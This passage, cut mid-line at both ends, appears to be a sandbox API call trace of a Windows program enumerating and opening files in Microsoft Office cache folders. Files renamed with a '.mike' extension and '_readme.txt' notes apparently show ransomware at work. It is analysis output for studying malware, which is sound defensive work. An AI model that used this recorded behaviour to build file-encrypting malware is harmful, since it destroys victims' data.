Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0041.794] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe319e0e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe31c4240, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0041.794] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe319e0e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe31c4240, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.795] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0041.795] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe312bcc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe312bcc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3151e20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x12e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.xml.mike", cAlternateFileName="OFFICE~1.MIK")) returned 1 [0041.795] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf885a000, ftCreationTime.dwHighDateTime=0x1cac4d7, ftLastAccessTime.dwLowDateTime=0xf885a000, ftLastAccessTime.dwHighDateTime=0x1cac4d7, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0041.795] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd900f00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbd900f00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x16854390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0041.795] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x147e5b00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x147e5b00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xff654fc0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0041.795] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3a02e00, ftCreationTime.dwHighDateTime=0x1cac5f7, ftLastAccessTime.dwLowDateTime=0xe3a02e00, ftLastAccessTime.dwHighDateTime=0x1cac5f7, ftLastWriteTime.dwLowDateTime=0x17e0dbf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x0, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0041.796] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe06a9500, ftCreationTime.dwHighDateTime=0x1cac7e5, ftLastAccessTime.dwLowDateTime=0xe06a9500, ftLastAccessTime.dwHighDateTime=0x1cac7e5, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0041.796] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb2e2000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbb2e2000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x1a41c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPlusrWW.msi", cAlternateFileName="PROPLU~1.MSI")) returned 1 [0041.796] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3151e20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3151e20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3177f80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPlusrWW.xml.mike", cAlternateFileName="PROPLU~1.MIK")) returned 1 [0041.796] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x262b2700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x262b2700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1ffd0c0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xa97cbdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPrWW.cab", cAlternateFileName="")) returned 1 [0041.796] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf14900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbf14900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xc96ff40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xd49ee31, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPrWW2.cab", cAlternateFileName="")) returned 1 [0041.796] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec13c00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbec13c00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x1682d290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0041.797] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe319e0e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe319e0e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe31c4240, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0041.797] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3151e20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3151e20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe31c4240, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0041.797] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3151e20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3151e20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe31c4240, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0041.797] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0041.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0041.797] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0041.797] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0041.797] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0041.797] CoTaskMemFree (pv=0x4fe370) [0041.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0041.797] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0041.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0041.798] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0041.798] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0041.798] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0041.799] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.799] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87078450, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87078450, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5d1e590, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0041.799] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87abdaa0, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87abdaa0, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5cd2aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0041.800] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe57f8e0, ftCreationTime.dwHighDateTime=0x1cbe1cb, ftLastAccessTime.dwLowDateTime=0xfe57f8e0, ftLastAccessTime.dwHighDateTime=0x1cbe1cb, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0041.800] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6644b620, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x6644b620, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa81b8770, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0041.800] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8238e540, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x8238e540, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5ddcc70, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0041.800] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7bd91af0, ftCreationTime.dwHighDateTime=0x1cb07b2, ftLastAccessTime.dwLowDateTime=0x7bd91af0, ftLastAccessTime.dwHighDateTime=0x1cb07b2, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x0, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0041.800] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2a2397e0, ftCreationTime.dwHighDateTime=0x1cbe19a, ftLastAccessTime.dwLowDateTime=0x2a2397e0, ftLastAccessTime.dwHighDateTime=0x1cbe19a, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0041.800] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c1614f0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7c1614f0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xa4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrjProrWW.msi", cAlternateFileName="PRJPRO~1.MSI")) returned 1 [0041.800] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cabec50, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7cabec50, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrjProrWW.xml", cAlternateFileName="PRJPRO~1.XML")) returned 1 [0041.800] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c87b0c0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x6c87b0c0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa6b67930, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x9b6ba9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrjPrrWW.cab", cAlternateFileName="")) returned 1 [0041.801] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69dde270, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x69dde270, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa8191670, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0041.801] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0041.801] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.801] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0041.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0041.802] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpFilePart=0x0) returned 0x4d [0041.802] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.802] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.802] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0041.802] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.803] GetFileType (hFile=0x264) returned 0x1 [0041.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.803] GetFileType (hFile=0x264) returned 0x1 [0041.803] CloseHandle (hObject=0x264) returned 1 [0041.803] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.803] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.803] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.803] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.803] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x211c5e0 | out: lpFileInformation=0x211c5e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87abdaa0, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87abdaa0, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5cd2aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x10b2)) returned 1 [0041.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.804] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.804] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x211c918 | out: lpFileInformation=0x211c918*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87abdaa0, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87abdaa0, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5cd2aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x10b2)) returned 1 [0041.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.804] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All 